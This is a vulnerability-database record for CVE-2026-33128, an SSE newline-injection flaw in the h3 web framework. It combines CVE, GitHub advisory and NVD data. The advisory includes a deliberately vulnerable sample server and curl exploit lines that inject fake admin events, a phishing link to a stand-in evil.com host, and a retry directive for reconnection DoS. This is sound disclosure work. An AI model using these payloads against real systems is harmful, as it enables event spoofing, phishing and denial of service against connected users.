CVE-2026-33128 (GCVE-0-2026-33128)
Vulnerability from cvelistv5 – Published: 2026-03-20 09:37 – Updated: 2026-03-20 11:40
VLAI?
Title
h3 has a Server-Sent Events Injection via Unsanitized Newlines in Event Stream Fields
Summary
H3 is a minimal H(TTP) framework. In versions prior to 1.15.6 and between 2.0.0 through 2.0.1-rc.14, createEventStream is vulnerable to Server-Sent Events (SSE) injection due to missing newline sanitization in formatEventStreamMessage() and formatEventStreamComment(). An attacker who controls any part of an SSE message field (id, event, data, or comment) can inject arbitrary SSE events to connected clients. This issue is fixed in versions 1.15.6 and 2.0.1-rc.15.
Severity ?
7.5 (High)
CWE
- CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33128",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-20T11:36:13.079547Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-20T11:40:27.956Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "h3",
"vendor": "h3js",
"versions": [
{
"status": "affected",
"version": "\u003e= 2.0.0, \u003c 2.0.1-rc.15"
},
{
"status": "affected",
"version": "\u003c 1.15.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "H3 is a minimal H(TTP) framework. In versions prior to 1.15.6 and between 2.0.0 through 2.0.1-rc.14, createEventStream is vulnerable to Server-Sent Events (SSE) injection due to missing newline sanitization in formatEventStreamMessage() and formatEventStreamComment(). An attacker who controls any part of an SSE message field (id, event, data, or comment) can inject arbitrary SSE events to connected clients. This issue is fixed in versions 1.15.6 and 2.0.1-rc.15."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-93",
"description": "CWE-93: Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-20T09:37:07.206Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/h3js/h3/security/advisories/GHSA-22cc-p3c6-wpvm",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/h3js/h3/security/advisories/GHSA-22cc-p3c6-wpvm"
},
{
"name": "https://github.com/h3js/h3/commit/7791538e15ca22437307c06b78fa155bb73632a6",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/h3js/h3/commit/7791538e15ca22437307c06b78fa155bb73632a6"
},
{
"name": "https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/internal/event-stream.ts#L170-L187",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/internal/event-stream.ts#L170-L187"
}
],
"source": {
"advisory": "GHSA-22cc-p3c6-wpvm",
"discovery": "UNKNOWN"
},
"title": "h3 has a Server-Sent Events Injection via Unsanitized Newlines in Event Stream Fields"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33128",
"datePublished": "2026-03-20T09:37:07.206Z",
"dateReserved": "2026-03-17T20:35:49.927Z",
"dateUpdated": "2026-03-20T11:40:27.956Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-33128\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T10:16:19.160\",\"lastModified\":\"2026-03-20T20:00:21.330\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"H3 is a minimal H(TTP) framework. In versions prior to 1.15.6 and between 2.0.0 through 2.0.1-rc.14, createEventStream is vulnerable to Server-Sent Events (SSE) injection due to missing newline sanitization in formatEventStreamMessage() and formatEventStreamComment(). An attacker who controls any part of an SSE message field (id, event, data, or comment) can inject arbitrary SSE events to connected clients. This issue is fixed in versions 1.15.6 and 2.0.1-rc.15.\"},{\"lang\":\"es\",\"value\":\"H3 es un framework H(TTP) m\u00ednimo. En versiones anteriores a la 1.15.6 y entre la 2.0.0 y la 2.0.1-rc.14, createEventStream es vulnerable a la inyecci\u00f3n de Eventos Enviados por el Servidor (SSE) debido a la falta de saneamiento de nueva l\u00ednea en formatEventStreamMessage() y formatEventStreamComment(). Un atacante que controla cualquier parte de un campo de mensaje SSE (id, evento, datos o comentario) puede inyectar eventos SSE arbitrarios a los clientes conectados. Este problema est\u00e1 solucionado en las versiones 1.15.6 y 2.0.1-rc.15.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.2,\"impactScore\":4.7},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":10.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-93\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"1.15.6\",\"matchCriteriaId\":\"8B8C8545-3682-40FD-A897-6729997A94E7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.0:*:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"A80DE960-665D-4590-B6D5-645099B808E2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc10:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"603A08FC-B20B-4693-90A1-0BF5F08B43AC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc11:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"BCC5ECF0-0EED-48BC-95FA-1D2671A971A9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc12:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"BCCBE75E-DCF6-45FD-B57E-F8E2ADE3129F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc13:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"3B66082C-3F3E-4BC6-9543-A2F9CFE3AAC6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc14:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"3D1C9D7B-3CE4-427B-93B4-EAF867159AFB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc2:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"C5E7779A-00CA-45E7-8F68-1DAB5388ED4A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc3:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"064C21F5-8633-45F3-9A3D-3FB029A867B9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc4:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"DDBC1DFD-8063-4AE1-92D8-B3B33735FEF0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc5:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"496314A3-8F2B-4274-9D0D-7F11E896FEA5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc6:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"35F49342-D52C-4762-9369-F380C5E7E0B5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc7:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"D11CA1A7-3141-46EA-9687-32C333FC7B0C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc8:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"A4A6FD03-5DE5-4D73-9FF3-BB653302C60B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc9:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"5E404148-6862-44F5-961D-10E8A742A4B6\"}]}]}],\"references\":[{\"url\":\"https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/internal/event-stream.ts#L170-L187\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/h3js/h3/commit/7791538e15ca22437307c06b78fa155bb73632a6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/h3js/h3/security/advisories/GHSA-22cc-p3c6-wpvm\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33128\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-20T11:36:13.079547Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-20T11:40:21.329Z\"}}], \"cna\": {\"title\": \"h3 has a Server-Sent Events Injection via Unsanitized Newlines in Event Stream Fields\", \"source\": {\"advisory\": \"GHSA-22cc-p3c6-wpvm\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"h3js\", \"product\": \"h3\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 2.0.0, \u003c 2.0.1-rc.15\"}, {\"status\": \"affected\", \"version\": \"\u003c 1.15.6\"}]}], \"references\": [{\"url\": \"https://github.com/h3js/h3/security/advisories/GHSA-22cc-p3c6-wpvm\", \"name\": \"https://github.com/h3js/h3/security/advisories/GHSA-22cc-p3c6-wpvm\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/h3js/h3/commit/7791538e15ca22437307c06b78fa155bb73632a6\", \"name\": \"https://github.com/h3js/h3/commit/7791538e15ca22437307c06b78fa155bb73632a6\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/internal/event-stream.ts#L170-L187\", \"name\": \"https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/internal/event-stream.ts#L170-L187\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"H3 is a minimal H(TTP) framework. In versions prior to 1.15.6 and between 2.0.0 through 2.0.1-rc.14, createEventStream is vulnerable to Server-Sent Events (SSE) injection due to missing newline sanitization in formatEventStreamMessage() and formatEventStreamComment(). An attacker who controls any part of an SSE message field (id, event, data, or comment) can inject arbitrary SSE events to connected clients. This issue is fixed in versions 1.15.6 and 2.0.1-rc.15.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-93\", \"description\": \"CWE-93: Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T09:37:07.206Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-33128\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-20T11:40:27.956Z\", \"dateReserved\": \"2026-03-17T20:35:49.927Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-20T09:37:07.206Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
GHSA-22CC-P3C6-WPVM
Vulnerability from github – Published: 2026-03-18 16:17 – Updated: 2026-03-20 21:27
VLAI?
Summary
h3 has a Server-Sent Events Injection via Unsanitized Newlines in Event Stream Fields
Details
Summary
createEventStream in h3 is vulnerable to Server-Sent Events (SSE) injection due to missing newline sanitization in formatEventStreamMessage() and formatEventStreamComment(). An attacker who controls any part of an SSE message field (id, event, data, or comment) can inject arbitrary SSE events to connected clients.
Details
The vulnerability exists in src/utils/internal/event-stream.ts, lines 170-187:
export function formatEventStreamComment(comment: string): string {
return `: ${comment}\n\n`;
}
export function formatEventStreamMessage(message: EventStreamMessage): string {
let result = "";
if (message.id) {
result += `id: ${message.id}\n`;
}
if (message.event) {
result += `event: ${message.event}\n`;
}
if (typeof message.retry === "number" && Number.isInteger(message.retry)) {
result += `retry: ${message.retry}\n`;
}
result += `data: ${message.data}\n\n`;
return result;
}
The SSE protocol (defined in the WHATWG HTML spec) uses newline characters (\n) as field delimiters and double newlines (\n\n) as event separators.
None of the fields (id, event, data, comment) are sanitized for newline characters before being interpolated into the SSE wire format. If any field value contains \n, the SSE framing is broken, allowing an attacker to:
- Inject arbitrary SSE fields — break out of one field and add
event:,data:,id:, orretry:directives - Inject entirely new SSE events — using
\n\nto terminate the current event and start a new one - Manipulate reconnection behavior — inject
retry: 1to force aggressive reconnection (DoS) - Override Last-Event-ID — inject
id:to manipulate which events are replayed on reconnection
Injection via the event field
Intended wire format: Actual wire format (with \n injection):
event: message event: message
data: attacker: hey event: admin ← INJECTED
data: ALL_USERS_HACKED ← INJECTED
data: attacker: hey
The browser's EventSource API parses these as two separate events: one message event and one admin event.
Injection via the data field
Intended: Actual (with \n\n injection):
event: message event: message
data: bob: hi data: bob: hi
← event boundary
event: system ← INJECTED event
data: Reset: evil.com ← INJECTED data
Before exploit:
PoC
Vulnerable server (sse-server.ts)
A realistic chat/notification server that broadcasts user input via SSE:
import { H3, createEventStream, getQuery } from "h3";
import { serve } from "h3/node";
const app = new H3();
const clients: any[] = [];
app.get("/events", (event) => {
const stream = createEventStream(event);
clients.push(stream);
stream.onClosed(() => {
clients.splice(clients.indexOf(stream), 1);
stream.close();
});
return stream.send();
});
app.get("/send", async (event) => {
const query = getQuery(event);
const user = query.user as string;
const msg = query.msg as string;
const type = (query.type as string) || "message";
for (const client of clients) {
await client.push({ event: type, data: `${user}: ${msg}` });
}
return { status: "sent" };
});
serve({ fetch: app.fetch });
Exploit
# 1. Inject fake "admin" event via event field
curl -s "http://localhost:3000/send?user=attacker&msg=hey&type=message%0aevent:%20admin%0adata:%20SYSTEM:%20Server%20shutting%20down"
# 2. Inject separate phishing event via data field
curl -s "http://localhost:3000/send?user=bob&msg=hi%0a%0aevent:%20system%0adata:%20Password%20reset:%20http://evil.com/steal&type=message"
# 3. Inject retry directive for reconnection DoS
curl -s "http://localhost:3000/send?user=x&msg=test%0aretry:%201&type=message"
Raw wire format proving injection
event: message
event: admin
data: ALL_USERS_COMPROMISED
data: attacker: legit
The browser's EventSource fires this as an admin event with data ALL_USERS_COMPROMISED — entirely controlled by the attacker.
Proof:
Impact
An attacker who can influence any field of an SSE message (common in chat applications, notification systems, live dashboards, AI streaming responses, and collaborative tools) can inject arbitrary SSE events that all connected clients will process as legitimate.
Attack scenarios:
- Cross-user content injection — inject fake messages in chat applications
- Phishing — inject fake system notifications with malicious links
- Event spoofing — trigger client-side handlers for privileged event types (e.g.,
admin,system) - Reconnection DoS — inject
retry: 1to force all clients to reconnect every 1ms - Last-Event-ID manipulation — override the event ID to cause event replay or skipping on reconnection
This is a framework-level vulnerability, not a developer misconfiguration — the framework's API accepts arbitrary strings but does not enforce the SSE protocol's invariant that field values must not contain newlines.
Severity ?
7.5 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.0.1-rc.14"
},
"package": {
"ecosystem": "npm",
"name": "h3"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.1-rc.15"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "h3"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.15.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33128"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-18T16:17:43Z",
"nvd_published_at": "2026-03-20T10:16:19Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`createEventStream` in h3 is vulnerable to Server-Sent Events (SSE) injection due to missing newline sanitization in `formatEventStreamMessage()` and `formatEventStreamComment()`. An attacker who controls any part of an SSE message field (`id`, `event`, `data`, or comment) can inject arbitrary SSE events to connected clients.\n\n## Details\n\nThe vulnerability exists in `src/utils/internal/event-stream.ts`, lines [170](https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/internal/event-stream.ts#L170)-[187](https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/internal/event-stream.ts#L187):\n\n```typescript\nexport function formatEventStreamComment(comment: string): string {\n return `: ${comment}\\n\\n`;\n}\n\nexport function formatEventStreamMessage(message: EventStreamMessage): string {\n let result = \"\";\n if (message.id) {\n result += `id: ${message.id}\\n`;\n }\n if (message.event) {\n result += `event: ${message.event}\\n`;\n }\n if (typeof message.retry === \"number\" \u0026\u0026 Number.isInteger(message.retry)) {\n result += `retry: ${message.retry}\\n`;\n }\n result += `data: ${message.data}\\n\\n`;\n return result;\n}\n```\n\nThe SSE protocol (defined in the [WHATWG HTML spec](https://html.spec.whatwg.org/multipage/server-sent-events.html#event-stream-interpretation)) uses newline characters (`\\n`) as field delimiters and double newlines (`\\n\\n`) as event separators.\n\nNone of the fields (`id`, `event`, `data`, comment) are sanitized for newline characters before being interpolated into the SSE wire format. If any field value contains `\\n`, the SSE framing is broken, allowing an attacker to:\n\n1. **Inject arbitrary SSE fields** \u2014 break out of one field and add `event:`, `data:`, `id:`, or `retry:` directives\n2. **Inject entirely new SSE events** \u2014 using `\\n\\n` to terminate the current event and start a new one\n3. **Manipulate reconnection behavior** \u2014 inject `retry: 1` to force aggressive reconnection (DoS)\n4. **Override Last-Event-ID** \u2014 inject `id:` to manipulate which events are replayed on reconnection\n\n### Injection via the `event` field\n\n```\nIntended wire format: Actual wire format (with \\n injection):\n\nevent: message event: message\ndata: attacker: hey event: admin \u2190 INJECTED\n data: ALL_USERS_HACKED \u2190 INJECTED\n data: attacker: hey\n```\n\nThe browser\u0027s `EventSource` API parses these as two separate events: one `message` event and one `admin` event.\n\n### Injection via the `data` field\n\n```\nIntended: Actual (with \\n\\n injection):\n\nevent: message event: message\ndata: bob: hi data: bob: hi\n \u2190 event boundary\n event: system \u2190 INJECTED event\n data: Reset: evil.com \u2190 INJECTED data\n```\n\nBefore exploit:\n\u003cimg width=\"700\" height=\"61\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d9d28296-0d42-40d7-b79c-d337406cbfc9\" /\u003e\n\n\u003cimg width=\"713\" height=\"228\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5a52debc-2775-4367-b427-df4100fe2b8e\" /\u003e\n\n## PoC\n\n### Vulnerable server (`sse-server.ts`)\n\nA realistic chat/notification server that broadcasts user input via SSE:\n\n```typescript\nimport { H3, createEventStream, getQuery } from \"h3\";\nimport { serve } from \"h3/node\";\n\nconst app = new H3();\nconst clients: any[] = [];\n\napp.get(\"/events\", (event) =\u003e {\n const stream = createEventStream(event);\n clients.push(stream);\n stream.onClosed(() =\u003e {\n clients.splice(clients.indexOf(stream), 1);\n stream.close();\n });\n return stream.send();\n});\n\napp.get(\"/send\", async (event) =\u003e {\n const query = getQuery(event);\n const user = query.user as string;\n const msg = query.msg as string;\n const type = (query.type as string) || \"message\";\n\n for (const client of clients) {\n await client.push({ event: type, data: `${user}: ${msg}` });\n }\n\n return { status: \"sent\" };\n});\n\nserve({ fetch: app.fetch });\n```\n\n### Exploit\n\n```bash\n# 1. Inject fake \"admin\" event via event field\ncurl -s \"http://localhost:3000/send?user=attacker\u0026msg=hey\u0026type=message%0aevent:%20admin%0adata:%20SYSTEM:%20Server%20shutting%20down\"\n\n# 2. Inject separate phishing event via data field\ncurl -s \"http://localhost:3000/send?user=bob\u0026msg=hi%0a%0aevent:%20system%0adata:%20Password%20reset:%20http://evil.com/steal\u0026type=message\"\n\n# 3. Inject retry directive for reconnection DoS\ncurl -s \"http://localhost:3000/send?user=x\u0026msg=test%0aretry:%201\u0026type=message\"\n```\n\n### Raw wire format proving injection\n\n```\nevent: message\nevent: admin\ndata: ALL_USERS_COMPROMISED\ndata: attacker: legit\n\n```\n\nThe browser\u0027s `EventSource` fires this as an `admin` event with data `ALL_USERS_COMPROMISED` \u2014 entirely controlled by the attacker.\n\nProof:\n\n\u003cimg width=\"856\" height=\"275\" alt=\"image\" src=\"https://github.com/user-attachments/assets/111d3fde-e461-4e44-8112-9f19fff41fec\" /\u003e\n\n\u003cimg width=\"950\" height=\"156\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ff750f9c-e5d9-4aa4-b48a-20b49747d2ab\" /\u003e\n\n\n## Impact\n\nAn attacker who can influence any field of an SSE message (common in chat applications, notification systems, live dashboards, AI streaming responses, and collaborative tools) can inject arbitrary SSE events that all connected clients will process as legitimate.\n\n**Attack scenarios:**\n\n- **Cross-user content injection** \u2014 inject fake messages in chat applications\n- **Phishing** \u2014 inject fake system notifications with malicious links\n- **Event spoofing** \u2014 trigger client-side handlers for privileged event types (e.g., `admin`, `system`)\n- **Reconnection DoS** \u2014 inject `retry: 1` to force all clients to reconnect every 1ms\n- **Last-Event-ID manipulation** \u2014 override the event ID to cause event replay or skipping on reconnection\n\nThis is a framework-level vulnerability, not a developer misconfiguration \u2014 the framework\u0027s API accepts arbitrary strings but does not enforce the SSE protocol\u0027s invariant that field values must not contain newlines.",
"id": "GHSA-22cc-p3c6-wpvm",
"modified": "2026-03-20T21:27:39Z",
"published": "2026-03-18T16:17:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/h3js/h3/security/advisories/GHSA-22cc-p3c6-wpvm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33128"
},
{
"type": "WEB",
"url": "https://github.com/h3js/h3/commit/7791538e15ca22437307c06b78fa155bb73632a6"
},
{
"type": "PACKAGE",
"url": "https://github.com/h3js/h3"
},
{
"type": "WEB",
"url": "https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/internal/event-stream.ts#L170-L187"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "h3 has a Server-Sent Events Injection via Unsanitized Newlines in Event Stream Fields"
}
FKIE_CVE-2026-33128
Vulnerability from fkie_nvd - Published: 2026-03-20 10:16 - Updated: 2026-03-20 20:00
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N
10.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
10.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Summary
H3 is a minimal H(TTP) framework. In versions prior to 1.15.6 and between 2.0.0 through 2.0.1-rc.14, createEventStream is vulnerable to Server-Sent Events (SSE) injection due to missing newline sanitization in formatEventStreamMessage() and formatEventStreamComment(). An attacker who controls any part of an SSE message field (id, event, data, or comment) can inject arbitrary SSE events to connected clients. This issue is fixed in versions 1.15.6 and 2.0.1-rc.15.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:h3:h3:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "8B8C8545-3682-40FD-A897-6729997A94E7",
"versionEndExcluding": "1.15.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.0:*:*:*:*:node.js:*:*",
"matchCriteriaId": "A80DE960-665D-4590-B6D5-645099B808E2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc10:*:*:*:node.js:*:*",
"matchCriteriaId": "603A08FC-B20B-4693-90A1-0BF5F08B43AC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc11:*:*:*:node.js:*:*",
"matchCriteriaId": "BCC5ECF0-0EED-48BC-95FA-1D2671A971A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc12:*:*:*:node.js:*:*",
"matchCriteriaId": "BCCBE75E-DCF6-45FD-B57E-F8E2ADE3129F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc13:*:*:*:node.js:*:*",
"matchCriteriaId": "3B66082C-3F3E-4BC6-9543-A2F9CFE3AAC6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc14:*:*:*:node.js:*:*",
"matchCriteriaId": "3D1C9D7B-3CE4-427B-93B4-EAF867159AFB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc2:*:*:*:node.js:*:*",
"matchCriteriaId": "C5E7779A-00CA-45E7-8F68-1DAB5388ED4A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc3:*:*:*:node.js:*:*",
"matchCriteriaId": "064C21F5-8633-45F3-9A3D-3FB029A867B9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc4:*:*:*:node.js:*:*",
"matchCriteriaId": "DDBC1DFD-8063-4AE1-92D8-B3B33735FEF0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc5:*:*:*:node.js:*:*",
"matchCriteriaId": "496314A3-8F2B-4274-9D0D-7F11E896FEA5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc6:*:*:*:node.js:*:*",
"matchCriteriaId": "35F49342-D52C-4762-9369-F380C5E7E0B5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc7:*:*:*:node.js:*:*",
"matchCriteriaId": "D11CA1A7-3141-46EA-9687-32C333FC7B0C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc8:*:*:*:node.js:*:*",
"matchCriteriaId": "A4A6FD03-5DE5-4D73-9FF3-BB653302C60B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:h3:h3:2.0.1:rc9:*:*:*:node.js:*:*",
"matchCriteriaId": "5E404148-6862-44F5-961D-10E8A742A4B6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
